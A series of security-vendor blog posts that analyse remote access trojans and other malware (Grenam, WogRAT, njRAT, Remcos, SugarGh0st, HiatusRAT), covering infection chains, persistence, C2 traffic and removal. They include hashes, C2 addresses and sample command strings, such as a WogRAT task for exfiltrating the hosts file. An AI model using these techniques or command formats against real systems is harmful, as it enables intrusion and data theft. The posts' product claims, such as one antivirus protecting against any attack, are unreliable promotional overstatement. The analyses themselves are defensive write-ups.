For most users, automatic removal with GridinSoft Anti-Malware is the safer option. It can detect hidden components and clean your system completely. Remember to practice safe computing habits to prevent future infections.

Don’t ignore antivirus detections. Even if Casdet turns out to be a false positive, it’s better to be safe than sorry. Regular system scans and good security practices will keep your computer protected.

Samples of Trojan:Win32/Casdet!rfn

• Trojan.Win64.Casdet.bot: fedd3ec33986d3d13386e3528a583bd1e071d622781419d55aadb21af7be860b
• Trojan.U.Casdet.bot: f2da3ad65646e73981fd8fb1dc25f2ca331a662600bfb7ff41696fe5dbf74ad4

The post How to Remove Trojan:Win32/Casdet!rfn from Windows 11 appeared first on Gridinsoft Blog.

Viruses like Grenam can be disguised as legitimate software. The specific capabilities and behaviors of the malware may differ depending on the variant. However, it is commonly associated with the delivery of other malicious software, making it a severe threat to the security and privacy of computer systems.

Virus:Win32/Grenam.VA!MSR Overview

Virus:Win32/Grenam.VA!MSR is a generic detection name used by Microsoft Defender Antivirus to identify a type of malware that belongs to the Grenam family. This family consists of backdoors and Remote Access Trojans (RATs). These types of malware are designed to provide unauthorized remote access to a target system. It is used to steal sensitive data, install malicious software, or cause other damage.

Grenam malware can infiltrate a system through various methods, but the most common ones include malicious advertising and pirated software. Once the malware is installed, it uses anti-analysis and defense software evasion features to avoid detection by antivirus programs. As a result, it can remain undetected on a system for long periods, giving access to more dangerous malware.

Technical Analysis

Let’s look at one of the Virus:Win32/Grenam.VA!MSR samples to understand how it works. Once the malware enters the system, it executes initial dropper files such as C:\DllLoader.exe and C:\Documents and Settings\\Application Data\Ground.exe. Next, the malware executes using scripts or command-line arguments, such as Windows Script Host or PowerShell, to initiate scripts. It also drops and executes binary files with absolutely meaningless names, like b013bf6f928a3bf40678e87d9da48f161e2e30908f98c78dfa9f2bd8cf3814d2.exe.

Moreover, some users report that their desktop wallpaper was changed after detecting this malware.

Establishing Persistence

To ensure continuity and maintain a persistent presence on the infected machine, it requesting the following permissions by calling for a WinAPI function:

SE_LOAD_DRIVER_PRIVILEGE

The malware may exploit system vulnerabilities or use stolen credentials to gain higher privileges necessary for deeper system access and modification. The malware often manipulates other system settings or uses exploits to elevate privileges.

After finishing with persistence, Grenam starts rummaging through registry keys to collect info about the system. It mainly concentrates on data like CPU, display resolution, installed programs, etc, without getting into user data.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Defense Evasion

To evade detection from antivirus software and system monitoring tools, the malware employs techniques such as obfuscating its files and operations, hiding windows, and masquerading its processes. It also uses XOR and RC4 to encode data, modify file attributes, and renames its files with misleading extensions.

These keys store advanced Windows Explorer settings like hidden files, file extensions, and title bar paths, system-wide policies affecting user accounts, rights, security options, and system behaviors, information on system services, and Shell Execute Hooks that modify Windows Shell behavior.

Command and Control

Finally, once it has the required access and control, the malware can execute actions as directed by its operators, including data exfiltration, further infections, or using the host for additional attacks. The malware opens backdoors and communicates with external servers via TCP and UDP to known bad IPs to establish control.

TCP 23.216.147.62:443
TCP 23.216.147.64:443
UDP a83f:8110:4170:706c:6963:6174:696f:6e50:53

This is a clear indicator of C2 activity. The malware infects other executable files or uses network connections to spread to additional systems within the network environment. It infects files and possibly uses network drives to spread itself.

How To Remove Virus:Win32/Grenam.VA!MSR?

If you are struggling with Virus:Win32/Grenam.VA!MSR, I suggest using GridinSoft Anti-Malware. This software has advanced features that can effectively find and neutralize malware from your system. In addition to removing existing threats, this solution provides long-term protection to prevent unwanted effects from other malware.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Virus:Win32/Grenam.VA!MSR appeared first on Gridinsoft Blog.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim’s device completely. Users often download RATs with a legitimate program, i.e., inside of hacked games from torrents or within an email attachment. Once an attacker compromises the host system, it can use it to spread RATs to additional vulnerable computers, thus creating a botnet. In addition, RAT can be deployed as a payload using exploit kits. Once successfully deployed, RAT directly connects to the command-and-control (C&C) server the attackers control. They achieve this by using a predefined open TCP port on the compromised device. Because the RAT provides administrator-level access, an attacker can do almost anything on a victim’s computer, such as:

• Use spyware and keyloggers to track the victim’s behavior
• Gain access to sensitive data, including social security numbers and credit card information
• View and record video from a webcam and microphone
• Take screenshots
• Format disks
• Download, change or delete files
• Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program. RAT is similar to Remote Desktop Protocol (RDP) or Anydesk but differs in its stealth. RAT establishes a command and control (C2) channel with the attacker’s server. This way, attackers can send commands to RAT, and it can return the data. RATs also have a set of built-in controls and methods for hiding their C2 traffic from detection.

RATs can be combined with additional modules, providing other capabilities. For example, suppose an attacker may gain a foothold using a RAT. Then, after examining the infected system with the RAT, he decides he needs to install a keylogger. Depending on his needs, RAT may have a built-in keylogging feature or the ability to download and add a keylogger module. It can also load and run an independent keylogger.

Why Remote Access Trojan is Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people. As a result, they gained remote access to a computer authenticated in the SCADA (supervisory control and data collection) machines that controlled the country’s utility infrastructure. In addition, Remote Access Trojan allowed attackers to access sensitive resources by bypassing the elevated privileges of the authenticated user on the network. Thus, an attack using RATs can take on a threatening scale, up to the threat to national security.

Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because malware typically carries many concealing features, allowing it to avoid any detection. In addition, RATs manage resource utilization levels so that there is no performance degradation, making it difficult to detect the threat.

Ways of using Remote Access Trojan

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

• Spying and blackmail: An attacker who has deployed a RAT on a user’s device gains access to the user’s cameras and microphones. Consequently, he can take pictures of the user and his surroundings and then use this to launch more sophisticated attacks or blackmail.
• Launch Distributed Denial of Service (DDoS) Attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with spoofed traffic. Even though the attack can cause network performance degradation, users are often unaware that hackers use their devices for DDoS attacks.
• Cryptomining: In some cases, attackers can use RATs to mine cryptocurrency on the victim’s computer. By scaling this action to many devices, they can make huge profits.

Remote file storage: Sometimes attackers can use RATs to store illegal content on unsuspecting victims’ machines. That way, authorities can’t shut down the attacker’s account or storage server because he keeps information on devices belonging to legitimate users.

• Industrial Systems Compromise: As described above, attackers can use RATs to gain control over large industrial systems. These could be utilities such as electricity and water supplies. As a result, an attacker can cause significant damage to the industrial equipment by sabotaging these systems and disrupting critical services in entire areas.

Remote Access Trojan Examples

njRAT

NjRAT is probably the most known and the oldest among remote-access trojans. Appeared in 2012, it keeps getting updates, which adjust its functionality to the modern “standards”, which makes up for its longevity. The reason for this is probably the attention from state-sponsored threat actors – APT36 and APT41 – who use it in cyberattacks almost since its very inception.

Key functionality of njRAT is typical for pretty much any remote-access trojan – it is about providing remote access. The latter is topped up with uploading and downloading files by command, log keystrokes and capture microphone and camera inputs. Some of its variants are also capable of grabbing credentials from browsers and cryptocurrency apps.

One interesting feature of this remote access trojan is its naming. Threat analysts use its original name interchangeably with Bladabindi. The latter is a detection name that Microsoft assigned to this trojan back in its early days. Usually, Redmond changes the naming as the malware gains volume and power, but this did not happen here.

Sakula

Sakula is seemingly harmless software with a legitimate digital signature. However, the malware first appeared in 2012 and is used against high-level targets. It allows attackers to take full advantage of remote administration on the device and uses simple unencrypted HTTP requests to communicate with the C&C server. Additionally, it uses a Mimikatz password stealer to authenticate using a hash transfer method that reuses operating system authentication hashes to hijack existing sessions.

KjW0rm

KjW0rm is a worm written in VBS in 2014 that uses obfuscation, making it difficult to detect on Windows computers. It has many variations; the older parent version is called “Njw0rm”. The malware and all other variants belong to the same family, with many features and similarities in its workflow. It deploys stealthily and then opens a backdoor that allows attackers to gain complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale spying campaign targeting production control systems (ICS) used in many industries. Its author is a hacker group known as Dragonfly and Energetic Bear. It gives attackers complete control over industrial equipment. Havex uses several mutations to avoid detection and has a minimal footprint on the victim’s device. It communicates with the C&C server via HTTP and HTTPS protocols.

Agent.BTZ/ComRat

Agent.BTZ/ComRat (also called Uroburos) is a Remote Access Trojan that became infamous after hackers used it to break into the U.S. military in 2008. The first version of this malware was probably released in 2007 and had worm-like properties, spreading via removable media. From 2007 to 2012, developers released two significant versions of RAT. Most likely, this is a development of the Russian government. It can be deployed via phishing attacks and uses encryption, anti-analysis, and forensic techniques to avoid detection. In addition, it provides complete administrative control over the infected machine and can transmit data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan application that runs in the background and stealthily collects information about the system, connected users, and network activity. This Remote Access Trojan was first identified in 2011 and is still actively used today. It provides complete administrative control over infected devices. For example, it can disable task manager, firewall, or user access control (UAC) on Windows machines. In addition, Dark Comet uses encryption, thereby avoiding detection by antivirus.

AlienSpy

AlienSpy is a RAT that supports multiple platforms. This allows payload creation for Windows, Linux, Mac OS X, and Android operating systems. It can collect information about the target system, activate the webcam, and securely connect to the C&C server, providing complete control over the device. In addition, AlienSpy uses anti-analysis techniques to detect the presence of virtual machines. According to the researcher who analyzed the threat, the operator behind the author of the service is a native Spanish speaker, probably Mexican.

Heseber BOT

The Heseber BOT is based on the traditional VNC remote access tool. It uses VNC to remotely control the target device and transfer data to the C&C server. However, it does not provide administrative access to the machine unless the user has such permissions. Since VNC is a legitimate tool, Haseber antivirus tools do not identify it as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows introduced in 1998. It supports most versions beginning with Windows 95 and is deployed as a server on the target device. It takes up little space, has a GUI client, and allows an attacker to gain complete control over the system. RAT can also use image processing techniques to control multiple computers simultaneously. The server communicates with its client via TCP or UDP, usually using port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on their stealthiness. Once it has appeared, you will likely struggle to detect it, even if the exact malware sample is not new. That’s why the best way to protect against Remote Access Trojan is to not even give it a chance to run. The following methods represent proactive actions that severely decrease the chance of malware introduction and the possibility of getting in trouble.

Security training

Unfortunately, the weakest link in any defense is the human element, which is the root cause of most security incidents, and RATs are no exception. Therefore, it’s strategy for defending against RATs depends on organization-wide security training. In addition, victims usually launch this malware through infected attachments and links in phishing campaigns. Therefore, employees must be vigilant not to contaminate the company network and jeopardize the entire organization accidentally.

Using multi-factor authentication (MFA)

Since RATs typically try to steal passwords and usernames for online accounts, using MFA can minimize the consequences if a person’s credentials are compromised. The main advantage of MFA is that it provides additional layers of security and reduces the likelihood that a consumer’s identity will be compromised. For example, suppose one factor, such as the user’s password, is stolen or compromised. In that case, the other factors provide an additional layer of security.

Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization’s network. However, with strict access controls, you can limit the consequences of compromised credentials. More stringent rules include:

• More strict firewall settings
• Safelisting IP addresses for authorized users
• Using more advanced antivirus solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential RAT compromise opportunity for attackers. Therefore, to minimize the attack surface, it’s important to only allow remote access through secure connections established through VPNs or security gateways. You can also use a clientless solution for remote access. It does not require additional plug-ins or software on end-user devices, as these devices are also targets for attackers.

Zero-trust security technologies

Recently, zero-trust security models have grown in popularity because they adhere to the “never trust, always verify” principle. Consequently, the zero-trust security approach offers precise control over lateral movements instead of full network access. It is critical to suppressing RAT attacks, as attackers use lateral moves to infect other systems and access sensitive data.

Focus on infection vectors

Like other malware, Remote Access Trojan is a threat only if installed and implemented on the target computer. Using secure browsing, anti-phishing solutions, and constantly patching systems can minimize the likelihood of RAT. Overall, these actions are a good tone for improving security for any case, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans that may present themselves as legitimate applications but contain malicious features associated with the actual application. Tracking the application and system for abnormal behavior can help identify signs that might indicate a Remote Access Trojan.

Monitoring network traffic

An attacker uses RATs to remotely control an infected computer over the network. Consequently, a RAT deployed on a local device communicates with a remote C&C server. Therefore, you should pay attention to unusual network traffic associated with such messages. In addition, it would be best to use tools such as web application firewalls to monitor and block C&C messages.

Implement least privilege

The concept of least privilege implies that applications, users, systems, etc., should be restricted to the permissions and access they need to do their jobs. Therefore, using the least privilege can help limit an attacker’s actions with RAT.

Are Remote Access Trojans illegal?

Well, yes, but actually, no. It all depends on how and what you use it for. It is not the program itself that makes such tasks illegal. It’s the implementation. You can test and execute if you’ve written a Remote Access Trojan and have a home lab. You can use it if you have written permission from the other party. However, if you use the RAT maliciously, you may face some legal problems. So, to distinguish, professionals use the term “remote access tools” for legitimate access and control and “remote access trojan” for illegitimate access and control.

The post Remote Access Trojan (RAT) appeared first on Gridinsoft Blog.

What is WogRAT (WingsOfGod.dll)?

WogRAT is a classic example of a remote access trojan, a backdoor-like malicious program that focuses on providing remote access to the infected system. ASEC researchers were first to detect and track the malware campaign. They additionally emphasize that this malicious program primarily targets Asian countries – China, Japan, Singapore and Hong Kong in the first place.

The strange thing about WogRAT is that its spreading campaigns were not detected, even though some of the methods were explained in the original research. Malware (more specifically – its loader) is disguised as a file posted on an online notepad service. Its naming supposes that frauds offer WogRAT as a system/program tweaking utility of some sort. This, in turn, supposes that initial spreading of the malware happens in “closed” places, like chats in messengers or the like.

Names for malware loader files that are available from aNotepad:

BrowserFixup.exe, ChromeFixup.exe, WindowsApp.exe, WindowsTool.exe, HttpDownload.exe, ToolKit.exe, flashsetup_LL3gjJ7.exe

WogRAT Malware Technical Analysis

As I said, the original downloading from the aNotepad site gets only the malware loader in the encoded form. Upon execution, it compiles itself on the run and requests the actual payload from a different page hosted on the same site. Depending on the attack, the source for the second-stage payload may differ.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 /OUT:C:\Users\\AppData\Local\Temp\RESF175.tmp c:\Users\\AppData\Local\Temp\2jahfobn\CSC51D40ACB8B5440B2A46FD286719924C.TMP – the command used by the loader to compile itself

The downloaded file is a similar .NET assembly, encoded with Base64 and present as a text string on the source website. Loader decrypts the payload and loads it into the memory using process hollowing technique.

C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 2068

Upon startup, WogRAT collects basic system information by checking different registry keys and executing commands. In particular, it gathers info about network connections, system version, username and some of the info regarding system policies. Malware stacks this data with the info of its own process and sends it to the command server in the HTTP POST request. After that, malware switches to idle, waiting for the commands.

act=on&bid=4844-1708721090438&name=System1\User1

WogRAT has a rather interesting set of commands and properties that it is expecting to receive. The simplified formula consists of 3 elements, and looks like this:

The resulting command is like the following:

task_id=upldr&task_type=3&task_data=C:\\Windows\System32\drivers\etc\hosts

This malware supports 5 different types of operations: running specific files, downloading or uploading the files, altering the idle time, and terminating the execution. Not a huge list at the first glance, but in combination with different task types this gives a full-fledged backdoor functionality.

How to remove WogRAT?

WogRAT is not the stealthiest malware out there; it is in fact more reliant on the tricky spreading method and double-staged loader. Still, the amount of hooks it creates in the system makes it particularly hard to remove manually. For that reason, I recommend using GridinSoft Anti-Malware: a full scan with that program will be enough to repel the RAT and all of its parts across the system.

The post WingsOfGod.dll – WogRAT Malware Analysis & Removal appeared first on Gridinsoft Blog.

What is Backdoor:Win32/Bladabindi!ml?

Backdoor:Win32/Bladabindi!ml is the Windows Defender detection for njRAT malware, that is categorized as backdoor. “Bladabindi” is one of many names used by antivirus companies to categorize and identify various malware, including njRAT.

NjRAT is a trojan and can be installed on a computer without the user’s knowledge. It acts as a backdoor, giving attackers remote access and control over the infected system. Once installed, njRAT can perform various activities including collecting sensitive information, recording keystrokes, stealing passwords, intercepting traffic, and even controlling the computer’s webcam and microphone.

Bladabindi!ml can be spread in a variety of ways. This includes email attachments or malicious links, downloads via malicious websites, exploitation of software vulnerabilities, or social engineering. It can also self-propagate by infecting USB drives connected to an infected computer. Cybercriminals can use various methods to trick users into installing njRAT on their computers.

Bladabindi Backdoor Threat Analysis

NjRAT features several versions, detected in different attacks. Nonetheless, they are not much different in terms of their capabilities and effects. Let’s have a look at what dangers a typical Bladabindi sample carries for the system.

Launch and Detection Evasion

Bladabindi employs various techniques to evade detection upon launch. It comes with its own builder, and before attacking, it allows hackers to pre-configure the payload to their needs before it is delivered to the victim’s computer. This includes the name of the executable file, startup key creation in the registry, directory placement within the target system, host IP address, and network port, among others.

Such customization enables njRAT to circumvent many static checks called to avoid antivirus detection. Additionally, the malware utilizes multiple .NET obfuscators, making its code challenging to analyze for both humans and automated systems. These features make njRAT a tough nut to both analyze and detect and obviously stand for its success.

Establishing Persistence

After the initial system checks, the Bladabindi backdoor ensures its persistence within the infected system by creating a startup instance, typically in the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” directory. It also manipulates the Windows registry by creating a key with a unique name and a random set of characters and digits under the “HKEY_CURRENT_USER\Software\32” hive. These actions ensure that the malware executes each time the system boots up. They maintain a foothold within the infected machine even after reboots.

Data Collection & Other Functionality

After finalizing the preparations, njRAT a.k.a Bladabindi performs some basic callouts to the command server. Depending on the response, malware can switch to the idle, start collecting user data or pull the additional payload from the remote server. The overall list of actions it can perform is the following:

• Executing remote shell commands
• Downloading and uploading files
• Capturing screenshots
• Logging keystrokes
• Camera and microphone access
• Stealing credentials from web browsers and desktop crypto applications

Is Win32/Bladabindi!ml false positive?

Some programs may have features or behaviors that may be mistakenly considered suspicious by antivirus software. As a result, Windows Defender shows a false positive detection. This may be due to the use of certain APIs, network requests, or data encryption that may be characteristic of malware but are also present in legitimate applications.

It’s also worth noting that antivirus often adds “!ml” to the end of its name – to indicate the use of the AI detection system. Although it is a highly effective method, without the confirmation from other detection systems, it is easy to make it generate false positive detections.

How to Remove Backdoor:Win32/Bladabindi!ml Virus?

The most reliable way to remove Backdoor:Win32/Bladabindi!ml is to use a reliable antivirus program with updated virus databases. I recommend an antivirus like GridinSoft Anti-Malware, it is best to detect and remove even the sophisticated malware like Bladabindi/njRAT.

After removing Win32/Bladabindi!ml, it is recommended to perform additional system scans to make sure that all threats have been successfully removed. And in the future, be vigilant when surfing the Internet and downloading files. Avoid visiting suspicious websites and opening attachments from unreliable sources.

The post Backdoor:Win32/Bladabindi!ml Analysis & Removal Guide appeared first on Gridinsoft Blog.

Remcos RAT Uses Webhards to Spread

Recent research of South Korean cybersecurity firm AhnLab shares its observations regarding a new Remcos RAT spreading campaign. The company names Webhards as a source of choice for this malware to infiltrate user devices. Webhards is a file sharing platform, popular among computer pirates and people who seek free content. It may be used for legitimate purposes, though a selection of analysts name it a popular source of malware, along with torrents.

In the case of Remcos RAT, hackers use “hot topics” – either adult content or cracked versions of new games to make the user download the infected package. Then, the publication on the aforementioned site asks to run a Game.exe file, that is present in the downloaded archive. Upon running the executable file, a chain of VBS scripts are executed to download the final payload.

Upon downloading, another set of scripts injects Remcos into a system process called ServiceModelReg.exe. This is a built-in console utility that is, in fact, used only during the system installation and has no further application. Well, until this instance of Remcos finds its way to the machine, apparently.

What is Remcos RAT?

Remcos is a remote access trojan, marketed as a legit remote access tool by German firm BreakingSecurity. Released in 2019, it has become particularly popular in 2020 and 2021, when threat actors were using Covid-themed emails to spread it. Later though, its activity has become much more moderate, averaging at 30 samples per day during 2023.

For functionality, this malware is a classic example of RAT: Remcos provides full-featured remote access to the infected system, including access to system menus and file system. Additionally, it is capable of recording the screen, taking screenshots and setting the activity alarm. To identify target systems from each other, malware collects some basic information – OS version, date, time, and some basic hardware info.

How to protect against threats?

By looking at the ways the malware spreads you can already get the answer on how to protect yourself. In the case of Remcos, the obvious answer is to avoid cracked software. As it is not just a malware risk but also a copyright infringement, avoiding it is pretty much recommended. This is especially relevant for websites that are known for being used for malware distribution.

For an additional, passive layer of protection, you can have anti-malware software running in the background. A modern, well-stocked antivirus can protect you from any attack, regardless of the type of malware. GridinSoft Anti-Malware is the one you can rely on – its detection system offers exceptional protection in both proactive and reactive approaches.

The post Remcos RAT Targets South Korean Users Through Webhards appeared first on Gridinsoft Blog.

SugarGh0st Uses Spear Phishing to Attack Governments

Researchers have uncovered a new wave of cyber threats targeting government entities in Uzbekistan and South Korea in recent cybersecurity developments. Utilizing a customized variant of the infamous Gh0st RAT, dubbed SugarGh0st, the campaign displays a sophisticated and multi-stage infection chain.

Targets were focused on foreign ministry personnel based on lures about investment projects, account credentials, and internal memos. These topics were selected as likely to entice victims to enable the malware unknowingly while viewing what seemed like legitimate work documents. Overall, the pick of targets point at the relationship of SugarGh0st’s masters to Chinese government.

Multi-stage infection chain

Once delivered through emails, the malicious documents trigger a multi-stage process to install SugarGh0st on systems.It is performed using JavaScript and shortcut files execute commands to drop the RAT executable, decrypt it, and activate full functionality in the background. Techniques like LotL binaries, side-loading DLLs, and abusing legitimate Windows utilities help mask the deployment from defenses and user detection. Aimed at foreign ministry networks, the operational security exhibits an adversary carefully honing its tradecraft before targeting sensitive agencies.

Following the installation, SugarGh0st offers advanced monitoring, exfiltration, and manipulation capabilities. This surpasses typical malware in commodity cybercrime operations. Functions allow recording keystrokes, activating webcams, executing files, or killing processes – all directed dynamically by attacker commands. Such comprehensive access risks the integrity of infected government agencies through unconstrained internal spying.

Depending on operational security practices, lateral movement could also jeopardize more comprehensive departments and ministry networks. While assessing the total damage remains challenging, the implications are clearly severe. Moreover, this has allowed stolen secrets to impact international affairs or relations.

A Gh0st RAT Variant and Potential Chinese Connection

While the attribution remains speculative, artifacts in the decoy documents hint at a potential Chinese-speaking actor. Two files within the campaign contain Chinese characters in their “last modified by” names, suggesting a linguistic connection to China. As the name suggests, SugarGh0st represents an evolution of existing Chinese-linked Gh0st RAT variants in circulation for over 15 years. Developed by the Chinese group 红狼小组 (C.Rufus Security Team), Gh0st RAT has been active since 2008.

SugarGh0st retains the core functionalities of its predecessor but features customized reconnaissance capabilities and a modified communication protocol. The malware granted threat actors total remote control to pillage confidential data from infected networks. Enhancements include:

• expanded anti-detection tactics
• reconnaissance commands tailored to harvest documents and credentials
• new communications disguising C2 servers as Google Drive domains

Attacks on government entities, particularly embassies and ministries, is not a new phenomenon. Countries spied on each other all the time, and the tools were the only difference. While other countries do not expose their software, Asian government-sponsored hackers seem to not be ashamed of their software. And Chinese and North Korean hackers appear to be among the most public ones.

The post SugarGh0st RAT Targets Uzbekistan and South Korea appeared first on Gridinsoft Blog.

US DoD and Taiwan Companies Cyberattacks

First, let’s clear out the attacks upon quite famed organisations and companies. The long-going cyberattack upon Taiwanese companies and at least one government organisation was detected as early as in August 2023. Lumen researchers who studied the botnet established by the HiatusRAT in the past noticed a new flow of connections that comes from Taiwan IP address zones. Soon after, =cyberattacks on chemical production facilities, semiconductor manufacturers and one municipality were uncovered.

The story around the U.S. Department of Defence is a bit different. Same research group detected traffic coming to the IP addresses associated with the botnet not only from Taiwan but also from the US. Specifically, they discovered that crooks who stand behind the RAT used one of its Tier 2 servers to connect to the DoD server dedicated to work with defence contracts. Fortunately, no deep penetration happened here, and hackers were most probably performing reconnaissance before further actions.

HiatusRAT Analysis

First thing that comes into view when you check the Hiatus is its network architecture. Instead of infecting endpoints, it targets networking devices – at least it was doing so since its emergence in late 2021. Routers are gateways for humongous amounts of information – and having complete control over it may sometimes give you much more than hacking the computers in the network. Though, nothing stops Hiatus from delivering additional payloads to the target systems. Aside from sniffing, such a network of compromised routers can also serve as a network of proxy servers that conceal the real IP address from the target server.

To spread the payload, hackers seek business-grade network routers with vulnerable firmware installed. Firstlings of the botnet were amongst Draytek routers, specifically Vigor 2960 and 3900. Nowadays, malware has builds capable of infecting routers with chipsets based on Arm, i386, x86-64 and MIPS/MIPS64 architectures. This sets up quite a large number of devices, as network infrastructure firmware updates are implemented even more reluctantly than patches to regular software.

Execution flow

The attack chain that enables the RAT injection into the router is not clear even nowadays. Though it is clear that upon gaining initial access, attackers execute a batch script that downloads the payload and an auxiliary utility. The latter is a specific version of a tcpdump, a command-line tool that allows for packet analysis.

Upon execution, the first thing to do for HiatusRAT is kicking out other processes that may be listening to the same 8816 port. If there are any, malware jams one first and proceeds with normal launching. Then, a kind-of-classic step comes: malware gathers basic information about the device it has started on. Among such data is information about its MAC address, architecture, firmware and kernel versions. It also gets precise information about the file system and all files that can potentially be stored in the internal memory.

Once malware is done with these checks, it reads a tiny JSON that contains what appears to be malware config. There, malware retrieves a C2 servers address. Aside from the “main” server, there is one used to receive all the packages gathered with the modified tcpdump tool. The first request to the control server is a classic HTTP POST that contains several fields, with basic system info gathered the step before.

HiatusRAT Functionality

I’ve already mentioned the tcpdump-like tool that supplies a significant part of the RAT functionality. However, it does not stop at this point. Hiatus can receive different commands from the command server, which alter its functionality or even force the malware to melt down. Thing is, some of these functions were not used to the moment, despite being available since the first release of the malware back in 2021.

How to protect against network infrastructure attacks?

Well, Hiatus used to aim at routers with some specific architecture and series, but now it covers quite a bit of possible variants. The ways hackers use to deploy this malware are still unclear, so there are not many reactive measures to figure out. Instead, I have several proactive advice for you to stick to.

Use advanced network protection solutions. Well, antivirus programs are not greatly effective at preventing this RAT infection. Meanwhile, network protection solutions, especially ones that are designed to bear on heuristics, can effectively detect and dispatch the intruder just by its behaviour. Network Detection and Response systems, conjoined with SOAR and UBA solutions, can show excellent results at protecting the environment against tricky malware attacks.

Update (or upgrade) your networking devices regularly. Since the key point of the malware injection is vulnerable router firmware, it is essential to keep it updated. Keep an eye on malware attacks that were executed with or via vulnerabilities in networking devices. Usually, device manufacturers release updates in a matter of weeks. Though, there could be unfortunate cases when some really old devices reach end-of-life and are not supported in any form. In this case, you are out for device updating – this is the best and most definite way to get rid of the hazard.

Keep a well-done anti-malware software on hand. I’ve just said that anti-malware programs are not very effective in this case, and I say it is nice to have – so inconsistent of me, isn’t it? The answer is no, as anti-malware programs will serve as a preventive mechanism for malware that HiatusRAT can deliver through its functionality. Multi-layer security structures are always harder to penetrate, at least without triggering the alarm.

The post HiatusRAT Used in Attacks on Taiwan Companies and U.S. Military appeared first on Gridinsoft Blog.